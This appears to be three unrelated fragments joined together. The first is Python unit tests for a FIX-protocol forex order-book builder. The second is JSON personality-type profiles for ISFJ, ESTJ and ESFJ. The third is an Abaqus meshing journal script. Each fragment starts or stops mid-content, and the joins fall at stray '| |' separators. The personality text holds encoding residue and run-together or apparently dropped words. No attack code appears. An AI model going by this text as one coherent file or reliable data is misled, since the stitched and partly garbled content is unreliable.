msg = fix.Message('8=FIX.4.4|9=231|35=W|34=5|49=XC461|52=20210328-21:00:17.182|56=Q000|55=USD/CAD|262=1|268=4|269=0|270=1.35|271=2100000|299=0|106=1|269=1|270=1.35|271=1300000|299=0|106=1|269=0|270=1.35|271=2200000|299=1|106=0|269=1|270=1.35|271=1400000|299=1|106=0|10=168|'.replace('|', '\x01'), self.data_dictionary)
self.pricefeed.on_market_data_snapshot(msg, None)
item = self.pricefeed.queue.get()
self.assertEqual((1616965217182000, 'USDCAD', [
['0', 2100000.0, 1300000.0, 1.35, 1.35, '1', '1'],
['1', 2200000.0, 1400000.0, 1.35, 1.35, '0', '0'],
], True), item)
self.bookbuilder.process_item(item)
time, symbol, book = self.bookbuilder.outbound_queue.get()
self.assertEqual(1616965217182000, time)
self.assertEqual('USDCAD', symbol)
self.assertEqual(1616965217182000, book['time'])
# check bids
self.assertEqual(1616965217182000, book['bid_time0'])
self.assertEqual(1.35, book['bid_px0'])
self.assertEqual(2200000, book['bid_size0'])
self.assertEqual(b'0', book['bid_provider0'][0])
self.assertEqual(1616965217182000, book['bid_time1'])
self.assertEqual(1.35, book['bid_px1'])
self.assertEqual(2100000, book['bid_size1'])
self.assertEqual(b'1', book['bid_provider1'][0])
self.assertEqual(0, book['bid_time2'])
self.assertEqual(0, book['bid_px2'])
self.assertEqual(0, book['bid_size2'])
self.assertEqual(b'', book['bid_provider2'][0])
# check asks
self.assertEqual(1616965217182000, book['ask_time0'])
self.assertEqual(1.35, book['ask_px0'])
# FIXME: we should sort sizes descending always...
# self.assertEqual(1400000, book['ask_size0'])
# self.assertEqual(b'0', book['ask_provider0'][0])
self.assertEqual(1616965217182000, book['ask_time1'])
self.assertEqual(1.35, book['ask_px1'])
# FIXME: we should sort sizes descending always...
# self.assertEqual(1300000, book['ask_size1'])
# self.assertEqual(b'1', book['ask_provider1'][0])
self.assertEqual(0, book['ask_time2'])
self.assertEqual(0, book['ask_px2'])
self.assertEqual(0, book['ask_size2'])
self.assertEqual(b'', book['ask_provider2'][0])
np.savetxt('/tmp/book_usdcad_0017.csv', book, delimiter=',', fmt='%s')
# USD/CAD
# bids | asks
# [1] 2100000 @ 1.34*lp0 | [1] 1500000 @ 1.34*lp1
# [0] 2000000 @ 1.34*lp1 | [0] 1200000 @ 1.34*lp0
def test_snapshot_change_all_prices_and_sizes(self):
self.bookbuilder.quotes['USDCAD'] = {
'B0': {'entry_type': 0, 'price': 1.35, 'size': 2100000.0, 'provider': '1', 'time': 1616965217182000},
'S0': {'entry_type': 1, 'price': 1.35, 'size': 1300000.0, 'provider': '1', 'time': 1616965217182000},
'B1': {'entry_type': 0, 'price': 1.35, 'size': 2200000.0, 'provider': '0', 'time': 1616965217182000},
'S1': {'entry_type': 1, 'price': 1.35, 'size': 1400000.0, 'provider': '0', 'time': 1616965217182000}
}
msg = fix.Message('8=FIX.4.4|9=231|35=W|34=5|49=XC461|52=20210328-21:00:17.185|56=Q000|55=USD/CAD|262=1|268=4|269=0|270=1.34|271=2000000|299=0|106=1|269=1|270=1.34|271=1500000|299=0|106=1|269=0|270=1.34|271=2100000|299=1|106=0|269=1|270=1.34|271=1200000|299=1|106=0|10=165|'.replace('|', '\x01'), self.data_dictionary)
self.pricefeed.on_market_data_snapshot(msg, None)
item = self.pricefeed.queue.get()
self.assertEqual((1616965217185000, 'USDCAD', [
['0', 2000000.0, 1500000.0, 1.34, 1.34, '1', '1'],
['1', 2100000.0, 1200000.0, 1.34, 1.34, '0', '0'],
], True), item)
self.bookbuilder.process_item(item)
time, symbol, book = self.bookbuilder.outbound_queue.get()
self.assertEqual(1616965217185000, time)
self.assertEqual('USDCAD', symbol)
self.assertEqual(1616965217185000, book['time'])
# check bids
self.assertEqual(1616965217185000, book['bid_time0'])
self.assertEqual(1.34, book['bid_px0'])
self.assertEqual(2100000, book['bid_size0'])
self.assertEqual(b'0', book['bid_provider0'][0])
self.assertEqual(1616965217185000, book['bid_time1'])
self.assertEqual(1.34, book['bid_px1'])
self.assertEqual(2000000, book['bid_size1'])
self.assertEqual(b'1', book['bid_provider1'][0])
self.assertEqual(0, book['bid_time2'])
self.assertEqual(0, book['bid_px2'])
self.assertEqual(0, book['bid_size2'])
self.assertEqual(b'', book['bid_provider2'][0])
# check asks
self.assertEqual(1616965217185000, book['ask_time0'])
self.assertEqual(1.34, book['ask_px0'])
self.assertEqual(1500000, book['ask_size0'])
self.assertEqual(b'1', book['ask_provider0'][0])
self.assertEqual(1616965217185000, book['ask_time1'])
self.assertEqual(1.34, book['ask_px1'])
self.assertEqual(1200000, book['ask_size1'])
self.assertEqual(b'0', book['ask_provider1'][0])
self.assertEqual(0, book['ask_time2'])
self.assertEqual(0, book['ask_px2'])
self.assertEqual(0, book['ask_size2'])
self.assertEqual(b'', book['ask_provider2'][0])
np.savetxt('/tmp/book_usdcad_0018.csv', book, delimiter=',', fmt='%s')
# USD/CAD
# bids | asks
# [1] 2100000 @ 1.34 lp1*| [0] 1500000 @ 1.34 lp0*
# [0] 2000000 @ 1.34 lp0*| [1] 1200000 @ 1.34 lp1*
def test_snapshot_change_all_providers(self):
self.bookbuilder.quotes['USDCAD'] = {
'B0': {'entry_type': 0, 'price': 1.34, 'size': 2000000.0, 'provider': '1', 'time': 1616965217185000},
'S0': {'entry_type': 1, 'price': 1.34, 'size': 1500000.0, 'provider': '1', 'time': 1616965217185000},
'B1': {'entry_type': 0, 'price': 1.34, 'size': 2100000.0, 'provider': '0', 'time': 1616965217185000},
'S1': {'entry_type': 1, 'price': 1.34, 'size': 1200000.0, 'provider': '0', 'time': 1616965217185000}
}
msg = fix.Message('8=FIX.4.4|9=231|35=W|34=5|49=XC461|52=20210328-21:00:17.186|56=Q000|55=USD/CAD|262=1|268=4|269=0|270=1.34|271=2000000|299=0|106=0|269=1|270=1.34|271=1500000|299=0|106=0|269=0|270=1.34|271=2100000|299=1|106=1|269=1|270=1.34|271=1200000|299=1|106=1|10=166|'.replace('|', '\x01'), self.data_dictionary)
self.pricefeed.on_market_data_snapshot(msg, None)
item = self.pricefeed.queue.get()
self.assertEqual((1616965217186000, 'USDCAD', [
['0', 2000000.0, 1500000.0, 1.34, 1.34, '0', '0'],
['1', 2100000.0, 1200000.0, 1.34, 1.34, '1', '1'],
], True), item)
self.bookbuilder.process_item(item)
time, symbol, book = self.bookbuilder.outbound_queue.get()
self.assertEqual(1616965217186000, time)
self.assertEqual('USDCAD', symbol)
self.assertEqual(1616965217186000, book['time'])
# check bids
self.assertEqual(1616965217186000, book['bid_time0'])
self.assertEqual(1.34, book['bid_px0'])
self.assertEqual(2100000, book['bid_size0'])
self.assertEqual(b'1', book['bid_provider0'][0])
self.assertEqual(1616965217186000, book['bid_time1'])
self.assertEqual(1.34, book['bid_px1'])
self.assertEqual(2000000, book['bid_size1'])
self.assertEqual(b'0', book['bid_provider1'][0])
self.assertEqual(0, book['bid_time2'])
self.assertEqual(0, book['bid_px2'])
self.assertEqual(0, book['bid_size2'])
self.assertEqual(b'', book['bid_provider2'][0])
# check asks
self.assertEqual(1616965217186000, book['ask_time0'])
self.assertEqual(1.34, book['ask_px0'])
self.assertEqual(1500000, book['ask_size0'])
self.assertEqual(b'0', book['ask_provider0'][0])
self.assertEqual(1616965217186000, book['ask_time1'])
self.assertEqual(1.34, book['ask_px1'])
self.assertEqual(1200000, book['ask_size1'])
self.assertEqual(b'1', book['ask_provider1'][0])
self.assertEqual(0, book['ask_time2'])
self.assertEqual(0, book['ask_px2'])
self.assertEqual(0, book['ask_size2'])
self.assertEqual(b'', book['ask_provider2'][0])
np.savetxt('/tmp/book_usdcad_0019.csv', book, delimiter=',', fmt='%s')
## snapshot updates to 1 layer
# USD/CAD
# bids | asks
# [1] 2100000 @ 1.34 lp1 | [1] 1200000 @ 1.34 lp1
def test_snapshot_reduce_to_one_level(self):
self.bookbuilder.quotes['USDCAD'] = {
'B0': {'entry_type': 0, 'price': 1.34, 'size': 2000000.0, 'provider': '0', 'time': 1616965217186000},
'S0': {'entry_type': 1, 'price': 1.34, 'size': 1500000.0, 'provider': '0', 'time': 1616965217186000},
'B1': {'entry_type': 0, 'price': 1.34, 'size': 2100000.0, 'provider': '1', 'time': 1616965217186000},
'S1': {'entry_type': 1, 'price': 1.34, 'size': 1200000.0, 'provider': '1', 'time': 1616965217186000}
}
msg = fix.Message('8=FIX.4.4|9=153|35=W|34=5|49=XC461|52=20210328-21:00:17.187|56=Q000|55=USD/CAD|262=1|268=2|269=0|270=1.34|271=2100000|299=1|106=1|269=1|270=1.34|271=1200000|299=1|106=1|10=201|'.replace('|', '\x01'), self.data_dictionary)
self.pricefeed.on_market_data_snapshot(msg, None)
item = self.pricefeed.queue.get()
self.assertEqual((1616965217187000, 'USDCAD', [
['1', 2100000.0, 1200000.0, 1.34, 1.34, '1', '1'],
], True), item)
self.bookbuilder.process_item(item)
time, symbol, book = self.bookbuilder.outbound_queue.get()
self.assertEqual(1616965217187000, time)
self.assertEqual('USDCAD', symbol)
self.assertEqual(1616965217187000, book['time'])
# check bids
self.assertEqual(1616965217186000, book['bid_time0'])
self.assertEqual(1.34, book['bid_px0'])
self.assertEqual(2100000, book['bid_size0'])
self.assertEqual(b'1', book['bid_provider0'][0])
self.assertEqual(0, book['bid_time1'])
self.assertEqual(0, book['bid_px1'])
self.assertEqual(0, book['bid_size1'])
self.assertEqual(b'', book['bid_provider1'][0])
# check asks
self.assertEqual(1616965217186000, book['ask_time0'])
self.assertEqual(1.34, book['ask_px0'])
self.assertEqual(1200000, book['ask_size0'])
self.assertEqual(b'1', book['ask_provider0'][0])
self.assertEqual(0, book['ask_time1'])
self.assertEqual(0, book['ask_px1'])
self.assertEqual(0, book['ask_size1'])
self.assertEqual(b'', book['ask_provider1'][0])
np.savetxt('/tmp/book_usdcad_0020.csv', book, delimiter=',', fmt='%s')
# 8.) logout
def test_logout(self):
msg = fix.Message('8=FIX.4.4|9=55|35=5|34=2820|49=Q000|52=20210328-06:43:54.543|56=XC461|10=145|'.replace('|', '\x01'), self.data_dictionary)
# TODO: clear bookstate
# 9.) logon
def test_logon2(self):
msg = fix.Message('8=FIX.4.4|9=106|35=A|34=1|49=Q000|52=20210328-21:01:17.187|56=XC461|553=primexm_TradeFeedr_q|554=******|98=0|108=30|141=Y|10=41|'.replace('|', '\x01'), self.data_dictionary)
# nothing to do here (callback for offline?)
# 10.) v x 2
def test_subscribe2(self):
sub1 = fix.Message('8=FIX.4.4|9=112|35=V|34=2|49=Q000|52=20210328-21:02:00.516|56=XC461|262=0|263=1|264=16|265=1|146=1|55=EUR/USD|267=2|269=0|269=1|10=119|'.replace('|', '\x01'), self.data_dictionary)
sub2 = fix.Message('8=FIX.4.4|9=112|35=V|34=3|49=Q000|52=20210328-21:02:00.516|56=XC461|262=1|263=1|264=16|265=1|146=1|55=USD/CAD|267=2|269=0|269=1|10=85|'.replace('|', '\x01'), self.data_dictionary)
# nothing to do here (callback for offline?)
## mass quote, add id 0 (should be the only prices in book)
# USD/CAD
# bids | asks
# [0] 1000000 @ 1.33 lp0*| [0] 1100000 @ 1.35 lp0*
def test_mass_quote_freshly_cleared_book(self):
msg = fix.Message('8=FIX.4.4|9=124|35=i|34=6|49=XC461|52=20210328-21:02:17.157|56=Q000|296=1|302=1|295=1|299=0|106=0|134=1000000|135=1100000|188=1.33|190=1.35|10=33|'.replace('|', '\x01'), self.data_dictionary)
self.pricefeed.active_subscriptions['1'] = 'USDCAD'
self.pricefeed.on_mass_quote(msg, None)
item = self.pricefeed.queue.get()
self.assertEqual((1616965337157000, 'USDCAD', [
['0', 1000000.0, 1100000.0, 1.33, 1.35, '0', '0'],
], False), item)
self.bookbuilder.process_item(item)
time, symbol, book = self.bookbuilder.outbound_queue.get()
self.assertEqual(1616965337157000, time)
self.assertEqual('USDCAD', symbol)
self.assertEqual(1616965337157000, book['time'])
# check bids
self.assertEqual(1616965337157000, book['bid_time0'])
self.assertEqual(1.33, book['bid_px0'])
self.assertEqual(1000000, book['bid_size0'])
self.assertEqual(b'0', book['bid_provider0'][0])
self.assertEqual(0, book['bid_time1'])
self.assertEqual(0, book['bid_px1'])
self.assertEqual(0, book['bid_size1'])
self.assertEqual(b'', book['bid_provider1'][0])
# check asks
self.assertEqual(1616965337157000, book['ask_time0'])
self.assertEqual(1.35, book['ask_px0'])
self.assertEqual(1100000, book['ask_size0'])
self.assertEqual(b'0', book['ask_provider0'][0])
self.assertEqual(0, book['ask_time1'])
self.assertEqual(0, book['ask_px1'])
self.assertEqual(0, book['ask_size1'])
self.assertEqual(b'', book['ask_provider1'][0])
np.savetxt('/tmp/book_usdcad_0021.csv', book, delimiter=',', fmt='%s')
## snapshot, two levels, should update both entries
# EUR/USD
# bids | asks
# [1] 1000000*@ 2.45*lp0*| [0] 1000000*@ 2.48*lp1*
# [0] 2000000*@ 2.44*lp1*| [1] 2000000*@ 2.49*lp0*
def test_snapshot_freshly_cleared_book(self):
msg = fix.Message('8=FIX.4.4|9=231|35=W|34=4|49=XC461|52=20210328-21:02:17.158|56=Q000|55=EUR/USD|262=0|268=4|269=0|270=2.44|271=2000000|299=0|106=1|269=1|270=2.48|271=1000000|299=0|106=1|269=0|270=2.45|271=1000000|299=1|106=0|269=1|270=2.49|271=2000000|299=1|106=0|10=211|'.replace('|', '\x01'), self.data_dictionary)
self.pricefeed.on_market_data_snapshot(msg, None)
item | |
Vivid Recall Of Past Experiences In Order To Predict The Outcome Of Future Choices And Events.",
"Isfjs Place A Great Emphasis On Personal Considerations. Extraverted Feelers Are Focused On Developing Social Harmony And Connection. This Is Accomplished Through Behaviors That Are Viewed As Socially Appropriate Or Beneficial, Such As Being Polite, Kind, Considerate, And Helpful.",
"Isfjs Try To Fill The Wants And Needs Of Other People, Sometimes Even Sacrificing Their Own Desires In Order To Ensure That Other People Are Happy.",
"Isfjs Are Planners And Tend To Be Very Well-Organized.",
"This Function Tends To Become Stronger As People Grow Older And Involves Utilizing Logic In Order To Understand How The World Works.",
"As Isfjs Take In New Information And Experiences, They Look For Connections And Commonalities In Order To Find Patterns.",
"Rather Than Simply Trying To Understand A Small Part Of Something, They Want To See How Things Fit Together And How It Functions As A Whole.",
"While Isfjs Tend To Be Focused On The Present And On Concrete Facts, This Largely Unconscious Function Can Help Balance Personality By Helping Focus On Possibilities.",
"Taking In Facts And Then Explore The What-Ifs Can Lead To New Insights About Problems.",
"Istjs Are Planners; They Like To Carefully Plan Things Out Well In Advance. They Enjoy An Orderly Life. They Like Things To Be Well-Organized And Pay A Great Deal Of Attention To Detail. When Things Are In Disarray, People With This Personality Type May Find Themselves Unable To Rest Until They Have Set Everything Straight And The Work Has Been Completed.",
"Istjs Are Both Responsible And Realistic. They Take A Logical Approach To Achieving Goals And Completing Projects And Are Able To Work At A Steady Pace Toward Accomplishing These Tasks. They Are Able To Ignore Distractions In Order To Focus On The Task At Hand And Are Often Described As Dependable And Trustworthy.",
"Istjs Also Place A Great Deal Of Emphasis On Traditions And Laws. They Prefer To Follow Rules And Procedures That Have Previously Been Established. In Some Cases, Istjs Can Seem Rigid And Unyielding In Their Desire To Maintain Structure.",
"Introverted Sensors Are Focused On The Present Moment, Taking In An Abundance Of Information About Their Surroundings.",
"They Also Have Vivid Memories Of The Past And Rely On The Memories Of These Experiences To Form Expectations For The Future.",
"Istjs Are Logical And Efficient. They Enjoy Looking For Rational Explanations For Events.",
"They Prefer To Focus On The Details Rather Than Thinking About Abstract Information.",
"Being Efficient And Productive Is Important For People With This Personality Type. They Appreciate Knowledge That Has Immediate, Practical Applications.",
"Istjs Make Decisions Based On Logic And Objective Data Rather Than Personal Feelings.",
"As They Make Judgments, Istjs Often Make Personal Interpretations Based On Their Internal Set Of Values.",
"This Is Often Describedan Instinct Or Gut Feeling About A Situation. Istj Might Make A Decision Based On Logic, Only To Have This Feeling Kick In Telling Them To Trust Their Feelings Rather Than Just The Facts.",
"This Aspect Of Personality Enjoys New Ideas And Experiences.",
"This Is The Weakest Part Of The Istjs Personality, But Developing This Function Can Sometimes Lead To A More Balanced Personality."],
"Strengths": ["Reliable", "Practical", "Sensitive", "Eye For Detail"],
"Weaknesses": ["Dislikes Abstract Concepts", "Avoids Confrontation",
"Dislikes Change", "Neglects Own Needs"],
"KnownCelbrities": ["Mother Teresa, Nun And Humanitarian",
"<NAME>, Author", "<NAME>, Figure Skater",
"<NAME>, U.S. Army General",
"Dr. <NAME>, <NAME> Series By <NAME>"],
"Careers": ["Social Worker", "Counselor", "Nurse", "Paralegal", "Bookkeeper",
"Child Care Provider", "Office Manager", "Administrator", "Teacher",
"Banker", "Accountant"], "ID": "ISFJ"},
"ESTJ": {"Type": ["Extroversion", "Sensing", "Thinking", "Judging"], "Name": "Executive",
"AltName": "The Director", "Class": "fas fa-user-tie", "BGColor": "#f7991c",
"FTColor": "wheat",
"Description": "Excellent administrators, unsurpassed at managing things or people.",
"Dominant": "Extraverted Thinking", "Auxiliary": "Introverted Sensing",
"Tertiary": "Extraverted Intuition", "Inferior": "Introverted Feeling",
"KeyCharacteristics": [
"Individuals With This Personality Type Tend To Place A High Value On Tradition, Rules, And Security. Maintaining The Status Quo Is Important To Estjs And They Often Become Involved In Civics, Government And Community Organizations.",
"Because Of Their Orthodox Approach To Life, They Can Sometimes Be Seen As Rigid, Stubborn, And Unyielding. Their Take-Charge Attitude Makes It Easy For Estjs To Assume Leadership Positions.",
"Their Self-Confidence And Strong Convictions Help Them Excel At Putting Plans Into Action, But They Can At Times Appear Critical And Overly Aggressive, Particular When Other People Fail To Live Up To Their High Standards.",
"People Often Describe Estjs As Predictable, Stable, Committed, And Practical. They Tend To Be Very Frank And Honest When It Comes To Sharing Their Opinions, Which Can Sometimes Be Seen As Harsh Or Overly Critical.",
"Estjs Rely On Objective Information And Logic To Make Decisions4\\Ufeff Rather Than Personal Feelings. They Are Skilled At Making Objective, Impersonal Decisions. Rather Than Focusing On Their Own Subjective Feelings When They Are Making Judgments, They Consider Facts And Logic In Order To Make Rational Choices.",
"People With Estj Personality Types Tend To Be Very Practical. They Enjoy Learning About Things That They Can See An Immediate, Real-World Use For But Tend To Lose Interest In Things That Are Abstract Or Theoretical. Estjs Enjoy Concrete Facts4\\Ufeff As Opposed To Abstract Information.",
"They Are Good At Making Fast And Decisive Choices, But They May Often Rush To Judgment Before Considering All The Information About A Situation. One The Positive Side, This Trait Makes Them Good Leaders, But It Can Sometimes Lead Them To Being Viewed As Harsh Or Abrasive.",
"They Are Good At Remembering Things With A Great Deal Of Detail. Their Memories Of Past Events Can Be Quite Vivid And They Often Utilize Their Recollections Of Past Experiences To Make Connections With Present Events.",
"Because Their Sensing Function Is Focused Inwardly, They Tend To Be Less Concerned With Novelty And More Focused On Familiarity. They Enjoy Having Habits And Routines That They Can Depend Upon. While This Gives Them Stability And Predictability, It Can Also Make Them Stubborn And Unyielding At Times.",
"This Aspect Of Personality Seeks Out Novel Ideas And Possibilities. It Compels People With This Personality Type To Explore Their Creativity.",
"As They Process New Ideas And Information, They May Explore The Possible Meanings In Order To Spot New Connections Or Patterns. This Allows Them To Look At Incoming Information And Recognize That There May Be More Than One Interpretation Or Possible Outcome.",
"When This Function Is Used, It May Lead Estjs To Make Decisions Based More On Feelings Than On Logic. These Are Often Internal Valuations That Lead To Gut Feelings About Some Situations. While This Function Is Not Used As Often, In Some Cases A Person Might Allow Their Subjective Feelings To Override Their Objective Interpretation Of A Situation.",
"Estjs Tend To Give Much Thought To Their Own Emotions, So This Function Often Operates On A Largely Unconscious Basis."],
"Strengths": ["Practical And Realistic", "Dependable", "Self-Confident",
"Hard-Working", "Traditional", "Strong Leadership Skills"],
"Weaknesses": ["Insensitive", "Inflexible", "Not Good At Expressing Feelings",
"Argumentative", "Bossy"],
"KnownCelbrities": ["<NAME>, U.S. President",
"<NAME>, Television Personality", "<NAME>, Evangelist",
"<NAME>, Actor", "<NAME>, Character From Star Wars"],
"Careers": ["Police Officer", "Military", "Judge", "Teacher", "School Administrator",
"Business Manager", "Accountant", "Banker"], "ID": "ESTJ"},
"ESFJ": {"Type": ["Extroversion", "Sensing", "Feeling", "Judging"], "Name": "Consul",
"AltName": "The Caregiver", "Class": "fas fa-hands-helping", "BGColor": "#f0574b",
"FTColor": "wheat",
"Description": "Extraordinarily caring, social and popular people, always eager to help.",
"Dominant": "Extraverted Feeling", "Auxiliary": "Introverted Sensing",
"Tertiary": "Extraverted Intuition", "Inferior": "Introverted Thinking",
"KeyCharacteristics": [
"In Addition To Deriving Pleasure From Helping Others, Esfjs Also \\U200Bhave A Need For Approval. They Expect Their Kind And Giving Ways To Be Noticed And Appreciated By Others. They Are Sensitive To The Needs And Feelings Of Others And Are Good At Responding And Providing The Care That People Need. They Want To Be Liked By Others And | |
from section import *
from assembly import *
from step import *
from interaction import *
from load import *
from mesh import *
from job import *
from sketch import *
from visualization import *
from connectorBehavior import *
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#10 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#1000 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#400 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#800 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#4 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#200 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, elemShape=HEX, regions=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(('[#1 ]',
), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, elemShape=HEX, regions=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#8000 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#2000 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#100 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#2 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#4000 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].PartitionCellBySweepEdge(cells=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(('[#100 ]',
), ), edges=(mdb.models['Model-1'].parts['Part-2'].edges[16], ), sweepPath=
mdb.models['Model-1'].parts['Part-2'].edges[68])
mdb.models['Model-1'].parts['Part-2'].PartitionCellBySweepEdge(cells=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(('[#80 ]',
), ), edges=(mdb.models['Model-1'].parts['Part-2'].edges[20], ), sweepPath=
mdb.models['Model-1'].parts['Part-2'].edges[72])
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#402 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#3a1 ]', ), ), technique=SWEEP)
# Save by banerjee on Tue Oct 18 15:54:16 2011
from part import *
from material import *
from section import *
from assembly import *
from step import *
from interaction import *
from load import *
from mesh import *
from job import *
from sketch import *
from visualization import *
from connectorBehavior import *
mdb.models['Model-1'].parts['Part-2'].generateMesh()
mdb.models['Model-1'].parts['Part-2'].deleteMesh(regions=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#22010 ]', ), ))
mdb.models['Model-1'].parts['Part-2'].seedEdgeByNumber(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40000000 #80 #0 #20000 ]', ), ), number=15)
mdb.models['Model-1'].parts['Part-2'].seedEdgeBySize(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40000000 #80 #0 #20000 ]', ), ), size=0.006)
mdb.models['Model-1'].parts['Part-2'].deleteMesh(regions=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(('[#800 ]',
), ))
mdb.models['Model-1'].parts['Part-2'].seedEdgeBySize(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#44100000 #80 #0 #60800 ]', ), ), size=0.006)
mdb.models['Model-1'].parts['Part-2'].seedEdgeBySize(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#44100000 #80 #0 #60800 ]', ), ), size=0.005)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#44100000 #80 #0 #60800 ]', ), ), maxSize=0.006, minSize=0.005)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=SINGLE,
end1Edges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#44100000 #80 #0 #40800 ]', ), ), end2Edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#0:3 #20000 ]', ), ), maxSize=0.006, minSize=0.005)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=SINGLE,
end1Edges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#44100000 #80 #0 #40800 ]', ), ), end2Edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#0:3 #20000 ]', ), ), maxSize=0.006, minSize=0.004)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByNumber(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=15)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByNumber(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=14)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByNumber(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=18)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByNumber(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=20)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByNumber(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=22)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByNumber(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=24)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByNumber(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=27)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=27, ratio=5.0)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=24, ratio=5.0)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=21, ratio=5.0)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=19, ratio=5.0)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=17, ratio=5.0)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=17, ratio=3.0)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=18, ratio=3.0)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
